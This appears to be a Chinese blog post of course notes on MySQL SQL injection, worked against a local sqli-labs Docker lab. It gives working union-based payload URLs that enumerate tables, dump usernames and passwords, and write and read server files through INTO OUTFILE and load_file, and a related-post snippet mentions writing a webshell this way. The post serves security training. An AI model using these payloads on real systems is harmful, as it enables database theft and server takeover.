【小迪安全】Day12-13web漏洞-SQL注入之MYSQL注入

已于 2022-10-31 07:28:17 修改
阅读量443 收藏
点赞数
分类专栏: web安全 渗透测试 文章标签: 安全 sql 数据库
于 2022-10-28 16:12:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44312640/article/details/127573726
版权

web漏洞-SQL注入之MYSQL注入

文章目录

前言

​ 介绍了mysql数据库的简要sql注入流程。图片来源:https://blog.csdn.net/weixin_52444045/article/details/119080263?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522166694298616800180613937%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=166694298616800180613937&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2blogfirst_rank_ecpm_v1~rank_v31_ecpm-1-119080263-null-null.article_score_rank_blog&utm_term=SQL%E6%B3%A8%E5%85%A5&spm=1018.2226.3001.4450。

安装sqlilabs靶场

​ 项目地址:https://github.com/Audi-1/sqli-labs,docker镜像地址:https://hub.docker.com/r/c0ny1/sqli-labs/tags,写个docker-compose.xml文件启动起来。

version: '2.0'
services:
  pikachu:
    image: c0ny1/sqli-labs:0.1
    container_name: sqli-labs
    ports:
      - '8082:80'
    restart: unless-stopped

按流程进行SQL注入测试

判断注入点

​ 用Less-2来演示,如图,数据没查出来,有注入点。

判断表的列数

判断前端回显的是哪列数据

信息收集-获取数据库版本、名字、用户、操作系统

获取表名、列名

​ 5.5.47版本,直接从information_schema库中查。查表名:http://192.168.237.168:8082/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’。查列名:http://192.168.237.168:8082/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’

获取数据

http://192.168.237.168:8082/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from users

读写文件

写文件

​ http://192.168.237.168:8082/Less-2/?id=-1 union select 1,2,3 into outfile ‘/mytest777dir/myintofile.txt’ --+

读文件

​ http://192.168.237.168:8082/Less-2/?id=-1 union select 1,2,load_file(‘/mytest777dir/myintofile.txt’)

楓椛
关注
专栏目录
小迪安全day13WEB漏洞——SQL注入MYSQL注入
RichUee的博客
12-05 1388
MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。
小迪安全day12WEB 漏洞——SQL 注入
RichUee的博客
12-04 952
WEB 漏洞-SQL 注入在本系列课程学习中,SQL 注入漏洞将是重点部分,其中 SQL 注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关 SQL 注入的核心。同样此类漏洞WEB 安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。
小迪安全】Day18-19web漏洞-SQL注入安全狗waf绕过
qq_44312640的博客
11-06 851
介绍了安全狗的绕过方法及思路。
小迪安全】Day15web漏洞-SQL注入之Oracle,MongoDb等注入
qq_44312640的博客
11-01 367
介绍了access,oracle,mangodb,mssql,postgresql数据库注入方法以及部分工具的使用。
day25WEB攻防-通用漏洞&SQL读写注入&MYSQL&SqlServer&PostgreSQL
m0_69583059的博客
01-15 1133
Access无高权限注入点,只能猜解,还是暴力猜解MYSQL,PostgreSQL,MSSQL高权限注入点可以升级读写执行等,高权限注入可以通过写入后门或者读取相关配置文件获取当前网站的相关权限,不需要通过一步一步猜解数据,当然这只是里理论,在实际环境中,可能会因为数据库的某些设置或者防护导致无法读写注入,如果能绕过当然是最好的,如果不能绕过那么我们只能乖乖的一步一步猜解 读取文件:union select load_file('读取路径'),2,3 写入文件:union select '写入信息',2,
WEB漏洞-SQL注入MYSQL注入(学习笔记P13
m0_51943976的博客
07-29 694
小迪安全学习笔记P13
Web安全Day1 - SQL注入漏洞类型
念舒C.ying
10-19 1641
结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。1986年10月,美国国家标准学会对SQL进行规范后,以此作为关系式数据库管理系统的标准语言(ANSI X3. 135-1986),1987年得到国际标准组织的支持下成为国际标准。不过各种通行的数据库系统在其实践过程中都对SQL规范作了某些编改和扩充。所以,实际上不同数据库系统之间的SQL不能完全相互通用。
小迪安全学习笔记--第18天:web漏洞--SQL注入之堆叠以及waf绕过
zr1213159840的博客
12-15 847
堆叠注入 stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql 中,主要是命令行中,每一条语句结尾加;表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。 堆叠注入其实就是多条语句的执行。堆叠注入是存在局限性的,可能受到API或者数据库引擎的限制。可以通过堆叠注入向管理员表插入用户名和密码。 绕过 参数污染:当一个提交的内容中包含多个参数的时候,会根据不同的
day27WEB攻防-通用漏洞&SQL注入&常见SQL注入类型&Tamper脚本的使用
m0_69583059的博客
01-18 1519
如果在实战中我们遇到了这样的问题应该如何解决,这里我们可以采用宽字节绕过,就是借助一些繁体字符或者乱码字符来占用字节位数,从而尝试绕过,例如,如果对单引号'进行了转义,我们可以通过在单引号前面加上%df来占用转义符号,没有了转义字符传入的数据就是正常的了。开发程序里面,数字不需要单引号,字符需要单引号,双引号去概括的,在注入的时候,需要考虑到符号的闭合,才能正确去执行SQL,完成注入。在注入的过程中,会遇到一些复杂的注入(waf绕过,过滤,编码等),tamper脚本可以尝试绕过。
Web安全Day1 - SQL注入实战攻防
hongrisec的博客
02-20 3195
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.Web安全Day1 - SQL注入实战攻防 https://mp.weixin.qq.com/s/zP0MZNhnZG_S9aoHDXzvWA 1. SQL注入 1.1 漏洞简介 结构化查询语言(Structured Query Language...
【PTE-day01 sql注入
samRsa
11-05 227
database() #数据库名称version() #数据库版本user() #数据库使用者group_concat() #将参数拼接到一行集中输出limit a,b #依次取值 从a+b的位置取b的值进行输出hex() #对参数进行16进制编码unhex() #对参数进行16进制解码into outfile() #向服务器写入指定的文件。
php mysql 注入一句话木马_渗透技术--SQL注入写一句话木马原理
weixin_39800387的博客
02-19 2452
讲一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子:SELECT * INTO OUTFILE 'C:\log1.txt'这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面。利用这个原理我们可以把PHP的一句话木马写到磁盘上从而拿到webshell。本地的目标站点来实战一下,我们的目的是在目...
基于 SM3 的密钥派生函数 (KDF):国密合规的安全密钥生成方案
A_Lonely_Smile的博客
10-29 782
在现代加密技术中,密钥派生函数(Key Derivation Function, KDF)是一个将初始输入(如密码、共享密钥等)转换为安全密钥的过程,用于实现加密、消息认证等密码操作。特别是在符合国密标准的场景中,基于 SM3 的 KDF 已成为一种常用的密钥生成方式。本文将详细讲解 SM3-KDF 的工作原理,逐步介绍其实现过程,并提供 Java 代码示例,帮助您理解如何在项目中应用 SM3-KDF。
服务攻防之开发组件安全
qq_63831588的博客
10-28 1229
log4j 是 Apache 的一个开源日志库,是一个基于 Java 的日志记录框架,Log4j2 是 log4j 的后继者,其中引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI 组建等,被应用于业务系统开发,用于记录程序输入输出日志信息,log4j2 中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞,成功利用该漏洞可在目标服务器上执行任意代码。
冷钱包与热钱包的差异 | 加密货币存储的安全方案
最新发布
tusik68的博客
11-01 705
想要安全存储加密货币?了解冷钱包和热钱包的核心差异,找到适合的存储方式,确保您的数字资产安全无忧。
漫途焊机安全生产监管方案,提升安全生产管理水平!
mantoo2014的博客
11-01 177
随着智能制造时代的到来,企业安全生产管理的重要性日益凸显。因此,利用物联网技术和设备监控技术加强焊机安全生产监管,成为企业提升安全生产管理效率、降低安全事故率的重要手段。漫途焊机安全生产监管方案,凭借其物联网技术和设备监控技术。
uaGate SI——实现OT与IT的安全连接
SoftingChina的博客
10-28 810
对于许多制造商来说,诸如工业物联网(IIoT)、信息物理系统(CPS)和大数据等概念已经开始与其智能工厂的愿景紧密相连。智能工厂是将信息技术(IT)的数字世界与运营技术(OT)的物理世界连接起来,也就是实现IT与OT的融合。
【论文速读】| APILOT:通过避开过时API陷阱,引导大语言模型生成安全代码
m0_73736695的博客
11-01 498
论文提出了一种名为APILOT的系统,它通过实时更新过时API的数据集,并结合增强生成方法,引导LLMs生成版本感知的安全代码。
安全成为大模型的核心;大模型安全的途径:大模型对齐
ZJQ的博客
10-28 270
DPO的工作原理是:通过利用奖励函数与最优策略之间的映射关系,证明这个受限的奖励最大化问题可以通过单阶段的策略训练来精确优化。综上所述,人类反馈强化学习(RLHF)和直接偏好优化(DPO)都是大模型对齐技术中的重要方法。DPO简化了RLHF的流程,将强化学习的训练阶段转化为一个二分类问题,从而减少了内存消耗并提高了训练稳定性。RLHF,即Reinforcement Learning from Human Feedback,是一种结合了机器学习中的强化学习算法与人类主观判断的训练技术。
HW2020安全漏洞总结:SQL注入与RCE攻击
1. 用友GRP-u8 SQL注入:这是针对用友GRP-u8系统的一个SQL注入漏洞,攻击者可以通过构造恶意的SQL语句来执行未授权的操作,比如获取敏感数据、篡改数据库内容或者控制服务器。 2. 天融信TopApp-LB SQL注入:天融信...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值